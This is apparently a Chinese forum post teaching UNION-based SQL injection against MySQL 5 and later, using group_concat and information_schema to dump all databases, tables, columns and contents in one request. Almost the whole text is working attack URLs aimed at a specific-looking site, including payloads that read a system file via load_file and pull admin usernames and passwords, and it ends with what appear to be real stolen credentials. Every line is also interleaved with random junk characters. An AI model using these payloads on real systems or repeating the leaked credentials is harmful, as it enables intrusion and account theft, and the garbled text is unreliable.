此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
# N3 K* I* j! t但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
$ E# g E6 G1 v
& s/ Q9 n9 T5 l8 J) y4 c$ O3 T
6 ^; _5 {- p5 E$ Q2 C3 z6 E. f优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入5 Y5 Z7 R; V1 k' A0 _, k! d
/ R3 o5 Y) U# d+ j# W' [, q/ Z3 c缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
" s% k: A* g( ^. X8 o0 k5 O$ c2 y+ ] t" I
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
9 I1 j+ I1 Q3 u0 R在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等7 W [, m1 @. U. d/ S. ]0 r
( \7 V8 L- \4 O: G$ n
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17* I1 O1 z, W2 v k; M6 N) N
! g" Z" X3 V+ q$ E1 Z读出所有库:! M6 o$ f! h p; W" u4 ~8 U9 \6 M* U( ^
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA. b" s% |3 D. O
! i# p6 n0 m- @( o7 ]: v4 i+ K8 p) T. r) B) \& W! ?$ v
5 W8 A$ @1 _( K0 s! S! x5 F s; O) t
读出所有表:* Q* F& O3 @' ]. ~4 a2 i0 Q7 g
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
. z1 y& I3 S9 b. k% m1 f4 S* d6 q1 l( ?( ^
读出所有表字段:, i+ R1 L! s( t5 Q0 d% D
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)( c) K- G) u8 j2 @2 q$ F7 k) g+ j
*/ (97,100,109,105,110)为admin的ascii码 依次类推
L1 X' F3 f- y6 I: L0 ]/ }3 f! Q* O+ c' q- I7 Y: y4 y) c( W
读出所有表字段里的内容:% R( Z$ G1 }& F& R
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin- `' @7 D5 h7 U6 x' B# I, v x
# q& M: @7 s* K5 H0 `" w9 r& K0 c
* J2 a0 Y' l. ?9 w4 f8 U3 }" \& \
0 ? X( T3 [1 M: ?5 P* }0 m9 E! Q0 B9 W R6 _" w
% I; e) [2 s1 J' |7 [! f; A- R6 m3 }
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
+ ?7 w) F! Q7 n- v8 p& h% Q
# y1 k8 e R; s% J+ J0 ]3 B, ~' S x7 [2 F& J! ^2 `) L3 Y, }8 U) z( e% t
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
! j L8 X3 t6 w, L) G( D e% }: o7 D( w6 Z% F- y, h
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23! V( U1 s9 V* F' M( B9 y
1 C. J! W% H/ z0 n6 a/ W6 N/ x- x" @) }1 S7 E8 O! W+ N" o
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
. R+ N7 e# ?$ w) \, V: k2 p1 \! p( c) F5 R0 d/ w0 V
8 M: `: u8 x3 k% U' i R' q( l$ W webmaster:dzb521123,simlab:simadmin20043233
5 y3 g5 M1 z$ E1 q# F |